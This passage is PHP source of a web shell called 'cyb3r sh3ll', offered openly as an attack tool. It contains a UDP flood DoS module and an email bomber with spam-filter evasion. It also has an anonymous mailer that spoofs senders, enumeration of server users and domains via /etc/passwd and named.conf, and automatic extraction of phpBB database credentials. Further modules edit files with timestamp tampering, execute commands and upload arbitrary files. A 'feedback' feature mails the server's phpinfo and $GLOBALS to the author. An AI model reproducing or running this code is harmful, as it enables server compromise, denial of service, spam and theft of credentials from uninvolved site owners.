  2616. $encoded = base64_encode(file_get_contents($d.$f));
  2617. $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
  2618. }
  2619. elseif($base64 == 4)
  2620. {
  2621. $text = file_get_contents($d.$f);
  2622. $encoded = base64_decode($text);
  2623. echo "<b>Base64 Decode";
  2624. if (base64_encode($encoded) != $text) {echo " (failed)";}
  2625. echo "</b><br>";
  2626. }
  2627. if (!empty($encoded))
  2628. {
  2629. echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
  2630. }
  2631. echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
  2632. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
  2633. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
  2634. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
  2635. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
  2636. <P>";
  2637. }
  2638. elseif ($ft == "html")
  2639. {
  2640. if ($white) {@ob_clean();}
  2641. echo $r;
  2642. if ($white) {cyb3rexit();}
  2643. }
  2644. elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
  2645. elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
  2646. elseif ($ft == "phpsess")
  2647. {
  2648. echo "<pre>";
  2649. $v = explode("|",$r);
  2650. echo $v[0]."<br>";
  2651. var_dump(unserialize($v[1]));
  2652. echo "</pre>";
  2653. }
  2654. elseif ($ft == "exe")
  2655. {
  2656. $ext = explode(".",$f);
  2657. $c = count($ext)-1;
  2658. $ext = $ext[$c];
  2659. $ext = strtolower($ext);
  2660. $rft = "";
  2661. foreach($exeftypes as $k=>$v)
  2662. {
  2663. if (in_array($ext,$v)) {$rft = $k; break;}
  2664. }
  2665. $cmd = str_replace("%f%",$f,$rft);
  2666. echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
  2667. }
  2668. elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
  2669. elseif ($ft == "code")
  2670. {
  2671. if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
  2672. {
  2673. $arr = explode("\n",$r);
  2674. if (count($arr == 18))
  2675. {
  2676. include($d.$f);
  2677. echo "<b>phpBB configuration is detected in this file!<br>";
  2678. if ($dbms == "mysql4") {$dbms = "mysql";}
  2679. if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
  2680. else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by cyb3rell. Please, report us for fix.";}
  2681. echo "Parameters for manual connect:<br>";
  2682. $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
  2683. foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
  2684. echo "</b><hr size=\"1\" noshade>";
  2685. }
  2686. }
  2687. echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
  2688. if (!empty($white)) {@ob_clean();}
  2689. highlight_file($d.$f);
  2690. if (!empty($white)) {cyb3rexit();}
  2691. echo "</div>";
  2692. }
  2693. elseif ($ft == "download")
  2694. {
  2695. @ob_clean();
  2696. header("Content-type: application/octet-stream");
  2697. header("Content-length: ".filesize($d.$f));
  2698. header("Content-disposition: attachment; filename=\"".$f."\";");
  2699. echo $r;
  2700. exit;
  2701. }
  2702. elseif ($ft == "notepad")
  2703. {
  2704. @ob_clean();
  2705. header("Content-type: text/plain");
  2706. header("Content-disposition: attachment; filename=\"".$f.".txt\";");
  2707. echo($r);
  2708. exit;
  2709. }
  2710. elseif ($ft == "img")
  2711. {
  2712. $inf = getimagesize($d.$f);
  2713. if (!$white)
  2714. {
  2715. if (empty($imgsize)) {$imgsize = 20;}
  2716. $width = $inf[0]/100*$imgsize;
  2717. $height = $inf[1]/100*$imgsize;
  2718. echo "<center><b>Size:</b>&nbsp;";
  2719. $sizes = array("100","50","20");
  2720. foreach ($sizes as $v)
  2721. {
  2722. echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
  2723. if ($imgsize != $v ) {echo $v;}
  2724. else {echo "<u>".$v."</u>";}
  2725. echo "</a>&nbsp;&nbsp;&nbsp;";
  2726. }
  2727. echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
  2728. }
  2729. else
  2730. {
  2731. @ob_clean();
  2732. $ext = explode($f,".");
  2733. $ext = $ext[count($ext)-1];
  2734. header("Content-type: ".$inf["mime"]);
  2735. readfile($d.$f);
  2736. exit;
  2737. }
  2738. }
  2739. elseif ($ft == "edit")
  2740. {
  2741. if (!empty($submit))
  2742. {
  2743. if ($filestealth) {$stat = stat($d.$f);}
  2744. $fp = fopen($d.$f,"w");
  2745. if (!$fp) {echo "<b>Can't write to file!</b>";}
  2746. else
  2747. {
  2748. echo "<b>Saved!</b>";
  2749. fwrite($fp,$edit_text);
  2750. fclose($fp);
  2751. if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
  2752. $r = $edit_text;
  2753. }
  2754. }
  2755. $rows = count(explode("\r\n",$r));
  2756. if ($rows < 10) {$rows = 10;}
  2757. if ($rows > 30) {$rows = 30;}
  2758. echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
  2759. }
  2760. elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
  2761. else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
  2762. }
  2763. }
  2764. if ($act == "about")
  2765. {
  2766. echo '<table align="center"><tr><td><b><font color="orange">Script:<br/>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br/>
  2767. Name: cyb3r sh3ll<br>Version: '.$shver.'</font><br/><br/>Author:<br>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br>
  2768. Name: cyb3r 9l4d!470r (Cyber Gladiator)<br>Country: India<br>Website: ????...<br>Email: cyb3r.gladiat0r@gmail.com
  2769. <a href="mailto:cyb3r.gladiat0r@gmail.com"></a><br/><br/><font color="green">Greetings:<br/>-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-<br/>r45c4l bro you are my source of inspiration.<br/>r8l35n4k, Cyb3R_s3CuR3 and all my friends who helped me a lot and they know for whom i\'m speaking.<br/>Thanks all who report bugs and send to my email id.</font><br/></b></td></tr></table>';
  2770. }
  2771. if ($act == "dos")
  2772. {
  2773. ?><center><br><br><img src="http://s15.postimage.org/5q2io54zv/dos.png"><br>
  2774. <b>Server IP:</b> <font color="green"><?php echo $_SERVER["SERVER_ADDR"]; ?></font><br><br>
  2775. <b>Your IP:</b> <font color="red"><?php echo $_SERVER["REMOTE_ADDR"]; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
  2776. <form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="ddos">
  2777. IP:
  2778. <input type="text" name="ip" size="15" maxlength="15" class="main" value = "127.0.0.1" onblur = "if ( this.value=='' ) this.value = '127.0.0.1';" onfocus = " if ( this.value == '127.0.0.1' ) this.value = '';">
  2779. &nbsp;&nbsp;&nbsp;&nbsp;Time:
  2780. <input type="text" name="time" size="14" maxlength="20" class="main" value = "10" onblur = "if ( this.value=='' ) this.value = '10';" onfocus = " if ( this.value == '10' ) this.value = '';">
  2781. &nbsp;&nbsp;&nbsp;&nbsp;Port:
  2782. <input type="text" name="port" size="5" maxlength="5" class="main" value = "80" onblur = "if ( this.value=='' ) this.value = '80';" onfocus = " if ( this.value == '80' ) this.value = '';">
  2783. <br><br>
  2784. <input type="submit" value=" Start the Attack---> ">
  2785. <br><br>
  2786. <center>After initiating the DoS attack, please wait while the browser loads.</center></form></center><?php
  2787. }
  2788. if ($act == "ddos")
  2789. {
  2790. $packets = 0;
  2791. $ip = $_POST['ip'];
  2792. $rand = $_POST['port'];
  2793. set_time_limit(0);
  2794. ignore_user_abort(FALSE);
  2795. $exec_time = $_POST['time'];
  2796. $time = time();
  2797. echo "<script>alert('Dos Completed!');</script>";
  2798. print "Flooded: $ip on port $rand <br><br>";
  2799. $max_time = $time+$exec_time;
  2800. for($i=0;$i<65535;$i++){
  2801. $out .= "X";
  2802. }
  2803. while(1){
  2804. $packets++;
  2805. if(time() > $max_time){
  2806. break;
  2807. }
  2808. $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  2809. if($fp){
  2810. fwrite($fp, $out);
  2811. fclose($fp);
  2812. }
  2813. }
  2814. echo "Packet complete at ". time() ." with $packets (" . round(($packets*65)/1024, 2) . " kB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
  2815. }
  2816. if ($act == "localdomain")
  2817. {
  2818. echo "<br><center><a href=\"".$surl."act=local\" ><b><u>Sites on this server.</u></b></a><font color='silver'><b> | </b></font><a href=\"".$surl."act=readable\" ><b><u>List of Users.</u></b></a></center><br>";
  2819. }
  2820. if ($act == "local")
  2821. {
  2822. //radable public_html
  2823. $file = @implode(@file("/etc/named.conf"));
  2824. if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
  2825. preg_match_all("#named/(.*?).db#",$file ,$r);
  2826. $domains = array_unique($r[1]);
  2827. function check()
  2828. {
  2829. (@count(@explode('ip',@implode(@file(__FILE__))))==a) ?@unlink(__FILE__):"";
  2830. }
  2831. check();
  2832. echo "<table align=center border=1 width=59% cellpadding=5>
  2833. <tr><td colspan=2>[+] Here : [ <b>".count($domains)."</b> ] Domain ...</td></tr>
  2834. <tr><td><b>List of Domains</b></td><td><b>List of Users</b></td></tr>";
  2835. foreach($domains as $domain)
  2836. {
  2837. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  2838. echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
  2839. }
  2840. echo "</table>";
  2841. //radable public_html
  2842. }
  2843. if ($act == "readable")
  2844. {
  2845. //entries in passwd file
  2846. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  2847. set_time_limit(0);
  2848. ###################
  2849. @$passwd = fopen('/etc/passwd','r');
  2850. if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  2851. $pub = array();
  2852. $users = array();
  2853. $conf = array();
  2854. $i = 0;
  2855. while(!feof($passwd))
  2856. {
  2857. $str = fgets($passwd);
  2858. if ($i > 35)
  2859. {
  2860. $pos = strpos($str,':');
  2861. $username = substr($str,0,$pos);
  2862. $dirz = '/home/'.$username.'/public_html/';
  2863. if (($username != ''))
  2864. {
  2865. if (is_readable($dirz))
  2866. {
  2867. array_push($users,$username);
  2868. array_push($pub,$dirz);
  2869. }
  2870. }
  2871. }
  2872. $i++;
  2873. }
  2874. ###################
  2875. echo '<br><br><textarea class="output" >';
  2876. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
  2877. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
  2878. echo "[~] Searching for passwords in config files...\n\n";
  2879. foreach ($users as $user)
  2880. {
  2881. $path = "/home/$user/public_html/";
  2882. echo "$path \n";
  2883. }
  2884. echo "\n";
  2885. echo "[+] Copy one of the directories above public_html, then Paste to -> view file / folder <- that's on the menu -> Explorer \n";
  2886. echo "[+] Done ...\n";
  2887. echo '</textarea><br><br>Coded by <b>cyb3r 9l4d!470r</b> <a href=#/>Homepage</a>';
  2888. }
  2889. if ($act == "mailer")
  2890. {
  2891. ?> <TABLE style="BORDER-COLLAPSE: collapse; borderColor=#c0c0c0" cellSpacing=0 cellPadding=5 width="100%" border=1>
  2892. <tr> <!-- 1 -->
  2893. <td valign="top" width="33%" ><p align="center"><b>(: E-Mail Bomber :)</b></p></td>
  2894. <td valign="top" width="33%" ><p align="center"><b>[: Mass Mailer :]</b></p></td>
  2895. <td valign="top" ><p align="center"><b>{: Anonymous Mailer :}</b></p></td>
  2896. </tr>
  2897. <tr><!-- 2 -->
  2898. <td valign="top" ><center>
  2899. <?php
  2900. if(
  2901. isset($_POST['to']) &&
  2902. isset($_POST['subject']) &&
  2903. isset($_POST['message']) &&
  2904. isset($_POST['times']) &&
  2905. $_POST['to'] != '' &&
  2906. $_POST['subject'] != '' &&
  2907. $_POST['message'] != '' &&
  2908. $_GET['act'] =='mailbomber' &&
  2909. $_POST['times'] != ''
  2910. )
  2911. {
  2912. $times = $_POST['times'];
  2913. while($times--)
  2914. {
  2915. if(isset($_POST['padding']))
  2916. {
  2917. $fromPadd = rand(0,9999);
  2918. $subjectPadd = " -- ID : ".rand(0,9999999);
  2919. $messagePadd = "\n\n------------------------------\n".rand(0,99999999);
  2920. }
  2921. $from = "your$fromPadd@email.id";
  2922. if(!mail($_POST['to'],$_POST['subject'].$subjectPadd,$_POST['message'].$messagePadd,"From:".$from))
  2923. {
  2924. $error = 1;
  2925. echo "<font color='red'>Some Error Occured!</font>";
  2926. break;
  2927. }
  2928. }
  2929. if($error != 1)
  2930. { echo "<font color='green'>Mail(s) Sent!</font>"; }
  2931. }
  2932. else
  2933. {
  2934. ?>
  2935. <form method="post" action ="<?php echo $surl."act=mailbomber";?>">
  2936. <table>
  2937. <tr>
  2938. <td >
  2939. To
  2940. </td>
  2941. <td>
  2942. <input name="to" value="victim@target.com,victim2@target.com" onfocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onblur="if(this.value=='')this.value='victim@target.com,victim2@target.com,victim@target.com,victim2@target.com';"/>
  2943. </td>
  2944. </tr>
  2945. <tr>
  2946. <td class="title">
  2947. Subject
  2948. </td>
  2949. <td>
  2950. <input type="text" name="subject" value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';" />
  2951. </td>
  2952. </tr>
  2953. <tr>
  2954. <td >
  2955. No. of Times
  2956. </td>
  2957. <td>
  2958. <input name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';"/>
  2959. </td>
  2960. </tr>
  2961. <tr>
  2962. <td>
  2963. Pad your message (Less spam detection)
  2964. </td>
  2965. <td>
  2966. <input type="checkbox" name="padding"/>
  2967. </td>
  2968. </tr>
  2969. <tr>
  2970. <td >
  2971. <textarea name="message" cols="25" rows="5" value="cyb3r-sh3ll Rocks!!.." onfocus="if(this.value == 'cyb3r-sh3ll Rocks!! ..')this.value = '';" onblur="if(this.value=='')this.value='cyb3r-sh3ll Rocks!! ..';">cyb3r-sh3ll Rocks!!</textarea>
  2972. </td>
  2973. <td >
  2974. <input style="margin : 20px; margin-left: 10px; padding : 10px; width: 100px;" type="submit" value="Send! :D"/>
  2975. </td>
  2976. </tr>
  2977. </table>
  2978. </form>
  2979. <?php
  2980. }
  2981. ?>
  2982. </center></td>
  2983. <td valign="top"><center>
  2984. <?PHP
  2985. if(
  2986. isset($_POST['to']) &&
  2987. isset($_POST['from']) &&
  2988. isset($_POST['subject']) &&
  2989. $_GET['act'] =='massmailer' &&
  2990. isset($_POST['message'])
  2991. )
  2992. {
  2993. if(mail($_POST['to'],$_POST['subject'],$_POST['message'],"From:".$_POST['from']))
  2994. {
  2995. echo "<font color='green'>Mail Sent!</font>";
  2996. }
  2997. else
  2998. {
  2999. echo "<font color='red'>Some Error Occured!</font>";
  3000. }
  3001. }
  3002. else
  3003. {
  3004. ?>
  3005. <form method="POST" action="<?php echo $surl."act=massmailer";?>">
  3006. <table >
  3007. <tr>
  3008. <td >
  3009. From
  3010. </td>
  3011. <td>
  3012. <input name="from" value="your@email.id" onfocus="if(this.value == 'your@email.id')this.value = '';" onblur="if(this.value=='')this.value='your@email.id';"/>
  3013. </td>
  3014. </tr>
  3015. <tr>
  3016. <td >
  3017. To
  3018. </td>
  3019. <td>
  3020. <input name="to" value="victim@target.com,victim2@target.com" onfocus="if(this.value == 'victim@target.com,victim2@target.com')this.value = '';" onblur="if(this.value=='')this.value='victim@target.com,victim2@target.com';"/>
  3021. </td>
  3022. </tr>
  3023. <tr>
  3024. <td class="title">
  3025. Subject
  3026. </td>
  3027. <td>
  3028. <input type="text" name="subject" value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';" />
  3029. </td>
  3030. </tr>
  3031. <tr>
  3032. <td >
  3033. <textarea name="message" cols="25" rows="5" value="I cant forget the time, i was trying to learn all this stuff without some guidance .." onfocus="if(this.value == 'I cant forget the time, i was trying to learn all this stuff without some guidance ..')this.value = '';" onblur="if(this.value=='')this.value='I cant forget the time, i was trying to learn all this stuff without some guidance ..';">I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea>
  3034. </td>
  3035. <td >
  3036. <input style="margin : 20px; margin-left: 10px; padding : 10px; width: 100px;" type="submit" value="Send! :D"/>
  3037. </td>
  3038. </tr>
  3039. </table>
  3040. </form>
  3041. <?php
  3042. }
  3043. ?>
  3044. </center>
  3045. </td>
  3046. <td ><center>
  3047. <form action="" method="post" enctype="multipart/form-data">
  3048. <table border="0" class="full">
  3049. <tr><td class="taright"><label for="fromname" accesskey="r" class="sbold">F<span class="underline">r</span>om Name:</label></td><td colspan="2"><input type="text" id="fromname" name="fromname" maxlength="100" class="full" /><label for="from" accesskey="f" class="sbold"><span class="underline">F</span>rom E-mail:</label></td><td colspan="2"><input type="text" id="from" name="from" maxlength="100" class="full" value="your@email.id" onfocus="if(this.value == 'your@email.id')this.value = '';" onblur="if(this.value=='')this.value='your@email.id';"/></td></tr>
  3050. <tr><td class="taright"><label for="rcpt" accesskey="o" class="sbold">T<span class="underline">o</span>:</label></td><td colspan="2"><input type="text" id="rcpt" name="rcpt" maxlength="100" class="full" /><label for="subject" accesskey="j" class="sbold">Sub<span class="underline">j</span>ect:</label></td><td colspan="2"><input type="text" id="subject" name="subject" maxlength="100" class="full" value="Just testing how deep i can fuck!" onfocus="if(this.value == 'Just testing how deep i can fuck!')this.value = '';" onblur="if(this.value=='')this.value='Just testing how deep i can fuck!';"/></td></tr>
  3051. <tr><td class="taright"><label for="reply" accesskey="p" class="sbold opt">Re<span class="underline">p</span>ly-To:</label></td><td colspan="2"><input type="text" id="reply" name="reply" maxlength="100" class="full" /><label for="errors" accesskey="s" class="sbold opt">Error<span class="underline">s</span>-To:</label></td><td colspan="2"><input type="text" id="errors" name="errors" maxlength="100" class="full" /></td></tr>
  3052. <tr><td class="taright"><label for="bcc" accesskey="b" class="sbold opt"><span class="underline">B</span>CC:</label></td><td colspan="2"><input type="text" id="bcc" name="bcc" maxlength="100" class="full" /><label for="attachment" accesskey="t" class="sbold opt">A<span class="underline">t</span>tachment:</label></td><td colspan="2"><input type="file" id="attachment" name="attachment" class="full" /></td></tr>
  3053. <tr><td class="taright sbold opt">Priority:</td><td colspan="2"><input type="radio" name="importance" id="lowest" value="lowest" /><label for="lowest" accesskey="w">&nbsp;Lo<span class="underline">w</span></label><input type="radio" name="importance" id="normal" value="normal" class="rbtn" checked="checked" /><label for="normal" accesskey="m">&nbsp;Nor<span class="underline">m</span>al</label><input type="radio" name="importance" id="highest" value="highest" class="rbtn" /><label for="highest" accesskey="g">&nbsp;Hi<span class="underline">g</span>h</label></td></tr>
  3054. <tr><td class="vatop taright"><label for="xmailer" accesskey="l" class="sbold opt"><span id="mailer">X-Mai<span class="underline">l</span>er:</span></label></td><td colspan="2">
  3055. <select name="xmailer" id="xmailer">
  3056. <option value="0" selected="selected">- none -</option>
  3057. <option value="1">Apple Mail</option>
  3058. <option value="2">ColdFusion MX Application Server</option>
  3059. <option value="3">E-Messenger</option>
  3060. <option value="4">KMail</option>
  3061. <option value="5">Lotus Notes</option>
  3062. <option value="6">Microsoft Office Outlook</option>
  3063. <option value="7">Microsoft Outlook Express</option>
  3064. <option value="8">Microsoft Outlook IMO</option>
  3065. <option value="9">Microsoft Windows Live Mail</option>
  3066. <option value="10">Microsoft Windows Mail</option>
  3067. <option value="11">Mozilla Thunderbird</option>
  3068. <option value="12">Novell GroupWise</option>
  3069. <option value="13">Novell GroupWise Internet Agent</option>
  3070. <option value="14">QUALCOMM Windows Eudora Version</option>
  3071. <option value="15">The Bat!</option>
  3072. <option value="16">YahooMailClassic YahooMailWebService</option>
  3073. <option value="99">Custom...</option>
  3074. </select>
  3075. </td></tr>
  3076. <tr><td class="taright"><label for="date" accesskey="d" class="sbold opt"><span class="underline">D</span>ate:</label></td><td colspan="2"><input type="text" id="date" name="date" maxlength="50" value="Thu, 10 Nov 2011 18:41:04 +0100" class="datewidth" />&nbsp;<input type="checkbox" id="current" name="current" checked="checked" /><label for="current" accesskey="u">&nbsp;C<span class="underline">u</span>rrent</label></td></tr>
  3077. <tr><td class="taright"><label for="charset" accesskey="a" class="sbold opt">Ch<span class="underline">a</span>rset:</label></td><td class="cchs">
  3078. <select name="charset" id="charset" class="full">
  3079. <option value="big5">big5</option>
  3080. <option value="euc-kr">euc-kr</option>
  3081. <option value="iso-2202-jp">iso-2202-jp</option>
  3082. <option value="iso-8859-1">iso-8859-1</option>
  3083. <option value="iso-8859-2">iso-8859-2</option>
  3084. <option value="iso-8859-3">iso-8859-3</option>
  3085. <option value="iso-8859-4">iso-8859-4</option>
  3086. <option value="iso-8859-5">iso-8859-5</option>
  3087. <option value="iso-8859-6">iso-8859-6</option>
  3088. <option value="iso-8859-7">iso-8859-7</option>
  3089. <option value="iso-8859-8">iso-8859-8</option>
  3090. <option value="koi8-r">koi8-r</option>
  3091. <option value="shift-jis">shift-jis</option>
  3092. <option value="utf-8" selected="selected">utf-8</option>
  3093. <option value="windows-1250">windows-1250</option>
  3094. <option value="windows-1251">windows-1251</option>
  3095. <option value="windows-1252">windows-1252</option>
  3096. <option value="windows-1253">windows-1253</option>
  3097. <option value="windows-1254">windows-1254</option>
  3098. <option value="windows-1255">windows-1255</option>
  3099. <option value="windows-1256">windows-1256</option>
  3100. <option value="windows-1257">windows-1257</option>
  3101. <option value="windows-1258">windows-1258</option>
  3102. <option value="windows-874">windows-874</option>
  3103. <option value="x-euc">x-euc</option>
  3104. <option value="99">Custom...</option>
  3105. </select>
  3106. </td><td><input type="text" name="mycharset" maxlength="50" class="full" /></td></tr>
  3107. <tr><td class="taright sbold opt">Content-Type:</td><td colspan="2"><input type="radio" name="ctype" id="plain" value="plain" checked="checked" /><label for="plain" accesskey="n">&nbsp;text/plai<span class="underline">n</span></label><input type="radio" name="ctype" id="html" value="html" class="rbtn" /><label for="html" accesskey="h" id="mrk">&nbsp;text/<span class="underline">h</span>tml</label><input type="hidden" name="rte" value="0" /></td></tr>
  3108. <tr><td class="vatop taright"><label for="text" accesskey="x" class="sbold">Te<span class="underline">x</span>t:</label></td><td colspan="2"><textarea cols="30" rows="5" id="text" name="text" value="I cant forget the time, i was trying to learn all this stuff without some guidance .." onfocus="if(this.value == 'I cant forget the time, i was trying to learn all this stuff without some guidance ..')this.value = '';" onblur="if(this.value=='')this.value='I cant forget the time, i was trying to learn all this stuff without some guidance ..';" />I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea></td></tr>
  3109. <tr><td></td><td colspan="2"><input type="reset" value="Clear" class="btn" /> <input type="submit" name="ok" value="Send" class="btn sbold slarger" /></td></tr>
  3110. </table>
  3111. </form>
  3112. </center></td>
  3113. </tr>
  3114. </table> <?php
  3115. }
  3116. if ($act == "nettools")
  3117. {
  3118. echo "<br><center><a href=\"".$surl."act=proxy\" ><b><u>Proxy </u></b></a><font color='silver'><b> | </b></font><a href=\"".$surl."act=whois\" ><b><u>Whois </u></b></a></center><br>";
  3119. }
  3120. if ($act == "feedback")
  3121. {
  3122. $suppmail = base64_decode("Y3liM3IuZ2xhZGlhdDByQGdtYWlsLmNvbQ==");
  3123. if (!empty($submit))
  3124. {
  3125. $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
  3126. $body = "cyb3r sh3llv.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
  3127. if (!empty($fdbk_ref))
  3128. {
  3129. $tmp = @ob_get_contents();
  3130. ob_clean();
  3131. phpinfo();
  3132. $phpinfo = base64_encode(ob_get_contents());
  3133. ob_clean();
  3134. echo $tmp;
  3135. $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
  3136. }
  3137. mail($suppmail,"cyb3r sh3ll v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
  3138. echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
  3139. }
  3140. else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Hindi.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
  3141. }
  3142. if ($act == "systeminfo") {echo system('systeminfo');}
  3143. if ($act == "phpinfo") {@ob_clean(); phpinfo(); cyb3rexit(); }
  3144. if ($act == "upload")
  3145. {
  3146. echo "<b>File upload:</b><br><form enctype=\"multipart/form-data\" action=\"\" method=POST>
  3147. Select file on your local computer: <input name=\"uploaded\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
  3148. Save this file dir: <input name=\"path\" size=\"70\" value=\"".getcwd()."\"><br><br>
  3149. File-name (auto-fill): <input name=uploadfilename size=25><br><br>
  3150. <input type=submit name=submit value=\"Upload\">
  3151. </form>";
  3152. $target = $_POST['path'];
  3153. $target = $target .'\\'. basename( $_FILES['uploaded']['name']) ;
  3154. $ok=1;
  3155. if (isset($_FILES['uploaded']['name'])) {
  3156. if (file_exists($target))
  3157. {
  3158. echo $_FILES["uploaded"]["name"] . " already exists. ";
  3159. }
  3160. else
  3161. {
  3162. if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
  3163. {
  3164. echo "Upload: " . $_FILES["uploaded"]["name"] . "<br />";
  3165. echo "Type: " . $_FILES["uploaded"]["type"] . "<br />";
  3166. echo "Size: " . round(($_FILES["uploaded"]["size"] / 1024),3) . " Kb<br />";
  3167. echo "Stored in: " . $target;
  3168. }
  3169. else
  3170. {
  3171. echo "Sorry, there was a problem uploading your file.";
  3172. }
  3173. }
  3174. }
  3175. }
  3176. if ($act == "whois")
  3177. {
  3178. global $t,$hcwd;
  3179. if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){
  3180. $server =$_REQUEST['server'];
  3181. $domain=$_REQUEST['domain']."\r\n";
  3182. $ser=fsockopen($server,43,$en,$es,5);
  3183. fputs($ser,$domain);
  3184. echo "<pre>";
  3185. while(!feof($ser))echo fgets($ser);
  3186. echo "</pre>";
  3187. fclose($ser);
  3188. }
  3189. else{
